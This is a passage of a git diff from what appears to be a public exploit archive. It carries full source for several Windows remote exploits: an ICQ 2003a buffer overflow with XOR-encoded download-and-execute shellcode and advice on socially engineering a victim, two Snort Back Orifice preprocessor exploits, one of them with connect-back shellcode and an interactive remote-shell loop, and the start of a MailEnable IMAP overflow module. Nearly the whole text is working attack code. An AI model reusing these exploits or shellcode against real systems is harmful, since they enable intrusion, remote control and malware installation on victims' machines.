2003a and prior versions. -* -* Tested with : -* ICQ 2003a Build #3800 on Win XP Pro Sp2 -* ICQ 2002a Build #3728 on Win XP Pro Sp2 -* -*/ - - -#include -#include -#include - -char *Sifrele(char *pszName1) -{ - char *pszName = pszName1; - int Xor = 0x1d; - int Size = strlen(pszName); - for(int i=0;i\n"); - printf(" Example:icq_bof http://www.atmacasoft.com/small.exe\n"); - - return; - } - - /* Generic win32 http download shellcode - xored with 0x1d by delikon (http://delikon.de/) */ - char shellcode[] = "\xEB" - "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF" - "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13" - "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2" - "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90" - "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2" - 
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48" - "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43" - "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96" - "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD" - "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47" - "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D" - "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33" - "\x78\x65\x78\x1D"; - - FILE *file; - - char buf[485]; - char *web; - short int weblength; - char *pointer = NULL; - char *newshellcode; - - web = argv[1]; - weblength = (short int)0xff22; - pointer = strstr(shellcode,"\x22\xff"); - weblength -= strlen(web)+1; - memcpy(pointer,&weblength,2); - newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1); - strcpy(newshellcode,shellcode); - strcat(newshellcode,Sifrele(web)); - strcat(newshellcode,"\x1d"); - - if( (file = fopen("bof.txt", "w+")) == NULL ) - return; - - memset(buf, 0x90, 480); - - //ret - icqate32.dll (5.3.4.3727) jmp esp addr - [Universal] - *(DWORD *) &buf[34] = 0x12025c5c; - memcpy(buf+34+32,newshellcode,strlen(newshellcode)); - *(DWORD *) &buf[480] = 0x00000000; - - fprintf(file, "%s", buf); - fclose(file); - - printf("\r\nbof.txt has been generated!\r\n"); - - return; -} - -// milw0rm.com [2005-10-29] +/* +* +* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit +* Bug discovered & exploit coded by ATmaCA +* Web: http://www.spyinstructors.com && http://www.atmacasoft.com +* E-Mail: atmaca@icqmail.com +* Credit to Kozan and delicon +* +*/ + +/* +* Usage: +* +* Execute exploit, it will create "bof.txt" in current directory. 
+* Open ICQ <= 2003a and click "Add" button +* "Add / Invite Users to Your Contact List" dialog will be opened +* Copy the content of "bof.txt" to "First name" and "Last name" fields. +* Press "find" button +* +* Now, icq will download and run your server which you specified in WebUrl field. +* +* This exploit requires social engineering skills to use it. For example you should +* tell your friend that you've found a easter-egg and if he wants to see it he has to +* type your vuln. string to first and last name fields in icq then press find button etc... +* + +/* +* +* Affected versions: +* Mirabilis ICQ Pro 2003a and prior versions. +* +* Tested with : +* ICQ 2003a Build #3800 on Win XP Pro Sp2 +* ICQ 2002a Build #3728 on Win XP Pro Sp2 +* +*/ + + +#include +#include +#include + +char *Sifrele(char *pszName1) +{ + char *pszName = pszName1; + int Xor = 0x1d; + int Size = strlen(pszName); + for(int i=0;i\n"); + printf(" Example:icq_bof http://www.atmacasoft.com/small.exe\n"); + + return; + } + + /* Generic win32 http download shellcode + xored with 0x1d by delikon (http://delikon.de/) */ + char shellcode[] = "\xEB" + "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF" + "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13" + "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2" + "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90" + "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2" + "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48" + "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43" + "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96" + "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD" + "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47" + 
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D" + "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33" + "\x78\x65\x78\x1D"; + + FILE *file; + + char buf[485]; + char *web; + short int weblength; + char *pointer = NULL; + char *newshellcode; + + web = argv[1]; + weblength = (short int)0xff22; + pointer = strstr(shellcode,"\x22\xff"); + weblength -= strlen(web)+1; + memcpy(pointer,&weblength,2); + newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1); + strcpy(newshellcode,shellcode); + strcat(newshellcode,Sifrele(web)); + strcat(newshellcode,"\x1d"); + + if( (file = fopen("bof.txt", "w+")) == NULL ) + return; + + memset(buf, 0x90, 480); + + //ret - icqate32.dll (5.3.4.3727) jmp esp addr - [Universal] + *(DWORD *) &buf[34] = 0x12025c5c; + memcpy(buf+34+32,newshellcode,strlen(newshellcode)); + *(DWORD *) &buf[480] = 0x00000000; + + fprintf(file, "%s", buf); + fclose(file); + + printf("\r\nbof.txt has been generated!\r\n"); + + return; +} + +// milw0rm.com [2005-10-29] diff --git a/platforms/windows/remote/1279.pm b/platforms/windows/remote/1279.pm index 686bbd74e..68ab0820d 100755 --- a/platforms/windows/remote/1279.pm +++ b/platforms/windows/remote/1279.pm 
@@ -1,132 +1,132 @@ -############################################################### -# for educational purpose only -# by Kira < trir00t [at] gmail.com > -############################################################### -package Msf::Exploit::snort_bo_overflow_win32; -use base 'Msf::Exploit'; -use strict; -use Pex::Text; - -my $holdrand; -my $advanced = {}; - -my $info = -{ - 'Name' => 'Snort Back Orifice Preprocessor Overflow', - 'Version' => '$Revision: 1.0 $', - 'Authors' => [ 'Trirat Puttaraksa (Kira) ', ], - 'Arch' => ['x86'], - 'OS' => ['win32', 'win2000', 'winxp', 'win2003'], - 'Priv' => 1, - 'UserOpts' => { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 53], - }, - - 'Payload' => { - 'Space' => 1024, # you can use more spaces - 'BadChars' => "\x00", - }, - - 'Description' => Pex::Text::Freeform(qq{ - This exploits the buffer overflow in Snort version - 2.4.0 to 2.4.2. This particular module is capable of - exploiting the bug on x86 Win32, Win2000, WinXP and Win2003. - Exploitation in this vulnerability is depend on many factors. - Difference in GCC version, compiled option and - operating system made diffent technique in exploitation. 
- }), - - 'Refs' => [ - ['URL ', "http://www.securityfocus.com/bid/15131"], - ], - - 'Targets' => [ - - ["Snort 2.4.2 Binary on Windows XP Professional SP1", 0x77da54d4, - (18+1024+1028+1024)], - ["Snort 2.4.2 Binary on Windows XP Professional SP2", 0x77daacdb, - (18+1024+1028+1024)], - ["Snort 2.4.2 Binary on Windows Server 2003 SP1", 0x7d065177, - (18+1024+1028+1024)], - ["Snort 2.4.2 Binary on Windows Server 2000 SP0", 0x77e33f69, - (18+1024+1028+1024)], - ["Snort 2.4.2 Binary on Windows 2000 Professional SP0", 0x7850cdef, - (18+1024+1028+1024)], - ], - - 'Keys' => ['Snort'], -}; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return ($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - - my $target = $self->Targets->[$target_idx]; - - if(! $self->InitNops(128)) { - $self->PrintLine("[*] Failed to initialize the NOP module."); - return; - } - - my $socket = Msf::Socket::Udp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - ); - - if($self->IsError) { - $self->PrintLine("[*] Error creating socket: " . - $socket->GetError); - } - - $self->PrintLine(sprintf("[*] Trying " . $target->[0] . 
" using return address 0x%.8x....", $target->[1])); - - my $payload = "*!*QWTY?"; # Magic string: 8 bytes - $payload .= pack('V', $target->[2]); # Len: 4 bytes - $payload .= "\xed\xac\xef\x0d"; # UDP packet id - $payload .= "\x01"; # BO type (PING) - $payload .= "\x90" x 1024; # Data - $payload .= "\x90" x 1024; # offset to EIP - $payload .= pack('V', $target->[1]); # return address - $payload .= $shellcode; # our shellcode - - $payload = bocrypt($payload); # encrypted payload - - $self->PrintLine("[*] Sending Exploit...."); - $socket->Send($payload); -} - -sub bocrypt { - my $tmppayload = shift; - my @arrpayload = split(//, $tmppayload); - my $retpayload; - my $c; - - msrand(31337); - - foreach $c (@arrpayload) { - $retpayload .= chr((ord($c) ^ (mrand()%256))); - } - return ($retpayload); -} - -sub msrand { - $holdrand = shift; -} - -sub mrand { - return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16) & 0x7fff); -} - -# milw0rm.com [2005-11-01] +############################################################### +# for educational purpose only +# by Kira < trir00t [at] gmail.com > +############################################################### +package Msf::Exploit::snort_bo_overflow_win32; +use base 'Msf::Exploit'; +use strict; +use Pex::Text; + +my $holdrand; +my $advanced = {}; + +my $info = +{ + 'Name' => 'Snort Back Orifice Preprocessor Overflow', + 'Version' => '$Revision: 1.0 $', + 'Authors' => [ 'Trirat Puttaraksa (Kira) ', ], + 'Arch' => ['x86'], + 'OS' => ['win32', 'win2000', 'winxp', 'win2003'], + 'Priv' => 1, + 'UserOpts' => { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 53], + }, + + 'Payload' => { + 'Space' => 1024, # you can use more spaces + 'BadChars' => "\x00", + }, + + 'Description' => Pex::Text::Freeform(qq{ + This exploits the buffer overflow in Snort version + 2.4.0 to 2.4.2. This particular module is capable of + exploiting the bug on x86 Win32, Win2000, WinXP and Win2003. 
+ Exploitation in this vulnerability is depend on many factors. + Difference in GCC version, compiled option and + operating system made diffent technique in exploitation. + }), + + 'Refs' => [ + ['URL ', "http://www.securityfocus.com/bid/15131"], + ], + + 'Targets' => [ + + ["Snort 2.4.2 Binary on Windows XP Professional SP1", 0x77da54d4, + (18+1024+1028+1024)], + ["Snort 2.4.2 Binary on Windows XP Professional SP2", 0x77daacdb, + (18+1024+1028+1024)], + ["Snort 2.4.2 Binary on Windows Server 2003 SP1", 0x7d065177, + (18+1024+1028+1024)], + ["Snort 2.4.2 Binary on Windows Server 2000 SP0", 0x77e33f69, + (18+1024+1028+1024)], + ["Snort 2.4.2 Binary on Windows 2000 Professional SP0", 0x7850cdef, + (18+1024+1028+1024)], + ], + + 'Keys' => ['Snort'], +}; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return ($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + + my $target = $self->Targets->[$target_idx]; + + if(! $self->InitNops(128)) { + $self->PrintLine("[*] Failed to initialize the NOP module."); + return; + } + + my $socket = Msf::Socket::Udp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + ); + + if($self->IsError) { + $self->PrintLine("[*] Error creating socket: " . + $socket->GetError); + } + + $self->PrintLine(sprintf("[*] Trying " . $target->[0] . 
" using return address 0x%.8x....", $target->[1])); + + my $payload = "*!*QWTY?"; # Magic string: 8 bytes + $payload .= pack('V', $target->[2]); # Len: 4 bytes + $payload .= "\xed\xac\xef\x0d"; # UDP packet id + $payload .= "\x01"; # BO type (PING) + $payload .= "\x90" x 1024; # Data + $payload .= "\x90" x 1024; # offset to EIP + $payload .= pack('V', $target->[1]); # return address + $payload .= $shellcode; # our shellcode + + $payload = bocrypt($payload); # encrypted payload + + $self->PrintLine("[*] Sending Exploit...."); + $socket->Send($payload); +} + +sub bocrypt { + my $tmppayload = shift; + my @arrpayload = split(//, $tmppayload); + my $retpayload; + my $c; + + msrand(31337); + + foreach $c (@arrpayload) { + $retpayload .= chr((ord($c) ^ (mrand()%256))); + } + return ($retpayload); +} + +sub msrand { + $holdrand = shift; +} + +sub mrand { + return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16) & 0x7fff); +} + +# milw0rm.com [2005-11-01] diff --git a/platforms/windows/remote/130.c b/platforms/windows/remote/130.c index c6d1e716e..16cea7f5f 100755 --- a/platforms/windows/remote/130.c +++ b/platforms/windows/remote/130.c @@ -324,6 +324,6 @@ int main(int argc,char *argv[]) return 0; } - - -// milw0rm.com [2003-12-04] + + +// milw0rm.com [2003-12-04] diff --git a/platforms/windows/remote/1313.c b/platforms/windows/remote/1313.c index c7d33015a..3ba01225a 100755 --- a/platforms/windows/remote/1313.c +++ b/platforms/windows/remote/1313.c 
@@ -1,261 +1,261 @@ -/* - * snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit - * - * by Russell Sanford (xort@tty64.org) - * -> www.code-junkies.net <- - * - * Date: Nov 11, 2005 - * - * Discription: A buffer overflow exist in the snort pre-preprocessor - * designed to detect encrypted Back Orifice ping packets - * on a network. The overflow occurs as a result of a field - * size read directly from the data within that packet - * inwhich an attacker can specify. - * - * Credit: ISS XFORCE (great work as always) - * - * Information: CERT TA05-291A - * - * Respect: Pull The Plug & DARPA Net Communities - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define buffsize 1056 -#define COOKIE "*!*QWTY?" - -typedef struct { - char magic[8]; - int len; - int id; - char type; - char data[buffsize]; - char crc; -} BOHEADER; - -char buffer[buffsize+5000]; -static long holdrand = 31337L; -unsigned int ret_address = 0xbfffebad; - -// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP -char shellcode[] = -"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" -"\x45\xc4\x34\x1e" // IP-A -"\x81\x04\x24" -"\x01\x01\x01\x01" // IP-B -"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0" -"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0" -"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0" -"\x0b\xcd\x80\xeb\xfe"; - -int mrand (void) { - return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); -} - -void timeout(int sig_num) { - printf(" [-] Listen() for connect back shellcode timed out. 
Exploit Failed!\n"); - exit(1); -} - -int main(int argc, char **argv) { - - signal(SIGALRM,timeout); - - int s, z, i, len_inet, IP_a, IP_b, l, sent; - char *server_addr=argv[1]; - char *local_addr=argv[2]; - char buf[512]; - struct sockaddr_in adr_srvr, adr, loc_adr; - fd_set rfds, wfds; - - printf("\n\t,------------------------------------------------------------,\n" - "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n" - "\t| by Russell Sanford - xort@tty64.org |\n" - "\t`------------------------------------------------------------`\n\n"); - - /* - * Check for Valid Input - */ - - if (argc < 3) { - printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n"); - - exit(1); - } - - /* - * Fix up Safe Values for connect back shellcode - */ - - IP_a = inet_addr(argv[2]); - IP_b = 0; - - printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]); - - do { - IP_a -= 0x01010101; IP_b += 0x01010101; - } - while ( ((IP_a & 0x000000ff) == 0) || - ((IP_a & 0x0000ff00) == 0) || - ((IP_a & 0x00ff0000) == 0) || - ((IP_a & 0xff000000) == 0) ); - - *(int *)&shellcode[19] = IP_a; - *(int *)&shellcode[26] = IP_b; - - /* - * Create And Fill In Header Info - */ - - printf(" [x] Creating Evil Packet.\n"); - - BOHEADER evil_packet; - - memcpy(evil_packet.magic,COOKIE,8); - evil_packet.len = (buffsize+38); //1094 - evil_packet.id = 0xbadc0ded; - memset(evil_packet.data, 0x90, buffsize); - memcpy(&evil_packet.data[buffsize-300],shellcode,90); - evil_packet.type = 0x1; - evil_packet.crc = 0x43; - - printf(" [x] Using Return Address: 0x%.8x.\n",ret_address); - - *(int *)&evil_packet.data[buffsize-4] = ret_address; - - /* - * Encrypt Evil Packet - */ - - printf(" [x] Encrypting Packet.\n"); - - memcpy(buffer,&evil_packet,(18+buffsize)); - for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); } - - /* - * Set Up Socket To Send UDP Packet - */ - - printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]); - - memset(&adr_srvr,0,sizeof 
adr_srvr); - adr_srvr.sin_family = AF_INET; - adr_srvr.sin_port = htons(9000); - adr_srvr.sin_addr.s_addr = inet_addr(server_addr); - len_inet = sizeof adr_srvr; - - s = socket(AF_INET,SOCK_DGRAM,0); - - if ( s == -1 ) { - printf(" [-] Failed to Create Socket. Exiting...\n"); - exit(1); - } - - /* - * Send Packet - */ - - printf(" [x] Sending Packet.\n"); - - z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet); - - if ( z == -1 ) { - printf(" [-] Failed to Send Packet. Exiting...\n"); - exit(1); - } - - /* - * Listen For Connect Back Shellcode - */ - - printf(" [x] Listening for Connect Back Shellcode.\n"); - - s = socket(AF_INET,SOCK_STREAM,0); - - if ( s == -1 ) { - printf(" [-] Failed to Create Socket. Exiting...\n"); - exit(1); - } - - memset(&adr,0,sizeof adr); - adr.sin_family = AF_INET; - adr.sin_port = htons(21); - adr.sin_addr.s_addr = INADDR_ANY; - - z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr)); - - if ( z == -1 ) { - printf(" [-] Failed to Bind Socket. Exiting...\n"); - exit(1); - } - - alarm(30); // Set alarm so code can time out - listen(s,4); - - int sin_size = sizeof(struct sockaddr_in); - int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size); - - alarm(0); - - if (new_fd == -1 ) { - printf(" [-] Failed to Accept Connection. Exiting...\n"); - exit(1); - } - - printf(" [x] Connection Established! Exploit Successful.\n\n"); - - write(new_fd,"uname -a\nid\n",12); - - /* - * Establish Connection. 
(ripped) - */ - - while (1) { - FD_SET (0, &rfds); - FD_SET (new_fd, &rfds); - FD_SET (new_fd, &wfds); - - select (new_fd + 1, &rfds, NULL, NULL, NULL); - - if (FD_ISSET (0, &rfds)) { - l = read (0, buf, sizeof (buf)); - if (l <= 0) { - exit (EXIT_FAILURE); - } - sent=0; - while (!sent) { - select (new_fd+1, NULL, &wfds, NULL, NULL); - if (FD_ISSET(new_fd, &wfds)) { - write(new_fd, buf, l); - sent=1; - } - } - } - - if (FD_ISSET (new_fd, &rfds)) { - l = read (new_fd, buf, sizeof (buf)); - if (l == 0) { - fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n"); - exit (EXIT_FAILURE); - } else if (l < 0) { - exit (EXIT_FAILURE); - } - write (1, buf, l); - } - } - - return 0; -} - -// milw0rm.com [2005-11-11] +/* + * snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit + * + * by Russell Sanford (xort@tty64.org) + * -> www.code-junkies.net <- + * + * Date: Nov 11, 2005 + * + * Discription: A buffer overflow exist in the snort pre-preprocessor + * designed to detect encrypted Back Orifice ping packets + * on a network. The overflow occurs as a result of a field + * size read directly from the data within that packet + * inwhich an attacker can specify. + * + * Credit: ISS XFORCE (great work as always) + * + * Information: CERT TA05-291A + * + * Respect: Pull The Plug & DARPA Net Communities + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define buffsize 1056 +#define COOKIE "*!*QWTY?" + +typedef struct { + char magic[8]; + int len; + int id; + char type; + char data[buffsize]; + char crc; +} BOHEADER; + +char buffer[buffsize+5000]; +static long holdrand = 31337L; +unsigned int ret_address = 0xbfffebad; + +// 90 byte Connect Back shellcode. 
Connects Back to Port 21 to givin IP +char shellcode[] = +"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" +"\x45\xc4\x34\x1e" // IP-A +"\x81\x04\x24" +"\x01\x01\x01\x01" // IP-B +"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0" +"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0" +"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0" +"\x0b\xcd\x80\xeb\xfe"; + +int mrand (void) { + return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); +} + +void timeout(int sig_num) { + printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n"); + exit(1); +} + +int main(int argc, char **argv) { + + signal(SIGALRM,timeout); + + int s, z, i, len_inet, IP_a, IP_b, l, sent; + char *server_addr=argv[1]; + char *local_addr=argv[2]; + char buf[512]; + struct sockaddr_in adr_srvr, adr, loc_adr; + fd_set rfds, wfds; + + printf("\n\t,------------------------------------------------------------,\n" + "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n" + "\t| by Russell Sanford - xort@tty64.org |\n" + "\t`------------------------------------------------------------`\n\n"); + + /* + * Check for Valid Input + */ + + if (argc < 3) { + printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n"); + + exit(1); + } + + /* + * Fix up Safe Values for connect back shellcode + */ + + IP_a = inet_addr(argv[2]); + IP_b = 0; + + printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]); + + do { + IP_a -= 0x01010101; IP_b += 0x01010101; + } + while ( ((IP_a & 0x000000ff) == 0) || + ((IP_a & 0x0000ff00) == 0) || + ((IP_a & 0x00ff0000) == 0) || + ((IP_a & 0xff000000) == 0) ); + + *(int *)&shellcode[19] = IP_a; + *(int *)&shellcode[26] = IP_b; + + /* + * Create And Fill In Header Info + */ + + printf(" [x] Creating Evil Packet.\n"); + + BOHEADER evil_packet; + + memcpy(evil_packet.magic,COOKIE,8); + evil_packet.len = (buffsize+38); //1094 + 
evil_packet.id = 0xbadc0ded; + memset(evil_packet.data, 0x90, buffsize); + memcpy(&evil_packet.data[buffsize-300],shellcode,90); + evil_packet.type = 0x1; + evil_packet.crc = 0x43; + + printf(" [x] Using Return Address: 0x%.8x.\n",ret_address); + + *(int *)&evil_packet.data[buffsize-4] = ret_address; + + /* + * Encrypt Evil Packet + */ + + printf(" [x] Encrypting Packet.\n"); + + memcpy(buffer,&evil_packet,(18+buffsize)); + for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); } + + /* + * Set Up Socket To Send UDP Packet + */ + + printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]); + + memset(&adr_srvr,0,sizeof adr_srvr); + adr_srvr.sin_family = AF_INET; + adr_srvr.sin_port = htons(9000); + adr_srvr.sin_addr.s_addr = inet_addr(server_addr); + len_inet = sizeof adr_srvr; + + s = socket(AF_INET,SOCK_DGRAM,0); + + if ( s == -1 ) { + printf(" [-] Failed to Create Socket. Exiting...\n"); + exit(1); + } + + /* + * Send Packet + */ + + printf(" [x] Sending Packet.\n"); + + z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet); + + if ( z == -1 ) { + printf(" [-] Failed to Send Packet. Exiting...\n"); + exit(1); + } + + /* + * Listen For Connect Back Shellcode + */ + + printf(" [x] Listening for Connect Back Shellcode.\n"); + + s = socket(AF_INET,SOCK_STREAM,0); + + if ( s == -1 ) { + printf(" [-] Failed to Create Socket. Exiting...\n"); + exit(1); + } + + memset(&adr,0,sizeof adr); + adr.sin_family = AF_INET; + adr.sin_port = htons(21); + adr.sin_addr.s_addr = INADDR_ANY; + + z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr)); + + if ( z == -1 ) { + printf(" [-] Failed to Bind Socket. Exiting...\n"); + exit(1); + } + + alarm(30); // Set alarm so code can time out + listen(s,4); + + int sin_size = sizeof(struct sockaddr_in); + int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size); + + alarm(0); + + if (new_fd == -1 ) { + printf(" [-] Failed to Accept Connection. 
Exiting...\n"); + exit(1); + } + + printf(" [x] Connection Established! Exploit Successful.\n\n"); + + write(new_fd,"uname -a\nid\n",12); + + /* + * Establish Connection. (ripped) + */ + + while (1) { + FD_SET (0, &rfds); + FD_SET (new_fd, &rfds); + FD_SET (new_fd, &wfds); + + select (new_fd + 1, &rfds, NULL, NULL, NULL); + + if (FD_ISSET (0, &rfds)) { + l = read (0, buf, sizeof (buf)); + if (l <= 0) { + exit (EXIT_FAILURE); + } + sent=0; + while (!sent) { + select (new_fd+1, NULL, &wfds, NULL, NULL); + if (FD_ISSET(new_fd, &wfds)) { + write(new_fd, buf, l); + sent=1; + } + } + } + + if (FD_ISSET (new_fd, &rfds)) { + l = read (new_fd, buf, sizeof (buf)); + if (l == 0) { + fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n"); + exit (EXIT_FAILURE); + } else if (l < 0) { + exit (EXIT_FAILURE); + } + write (1, buf, l); + } + } + + return 0; +} + +// milw0rm.com [2005-11-11] diff --git a/platforms/windows/remote/1332.pm b/platforms/windows/remote/1332.pm index 02e5e26c6..9e1301234 100755 --- a/platforms/windows/remote/1332.pm +++ b/platforms/windows/remote/1332.pm 
@@ -1,158 +1,158 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::mailenable_imap_w3c; -use strict; -use base 'Msf::Exploit'; -use Msf::Socket::Tcp; -use Pex::Text; - -my $advanced = { - }; - -my $info = { - 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', - 'Version' => '$Revision: 1.1 $', - 'Authors' => [ 'y0 ', ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], - 'Priv' => 1, - 'AutoOpts' => - { - 'EXITFUNC' => 'thread', - }, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 143], - 'USER' => [1, 'DATA', 'IMAP Username'], - 'PASS' => [1, 'DATA', 'IMAP Password'], - - }, - 'Payload' => - { - 'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff", - 'Space' => 600, - 'BadChars' => "\x00\x0a\x0d\x20", - 'Keys' => ['+ws2ord'], - }, - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a buffer overflow in the W3C logging - functionality of the MailEnable IMAPD service. Logging is not - enabled by default and this exploit requires a valid username - and password to exploit the flaw. MailEnable Professional version - 1.6 and prior and MailEnable Enterprise version 1.1 and prior are - affected. 
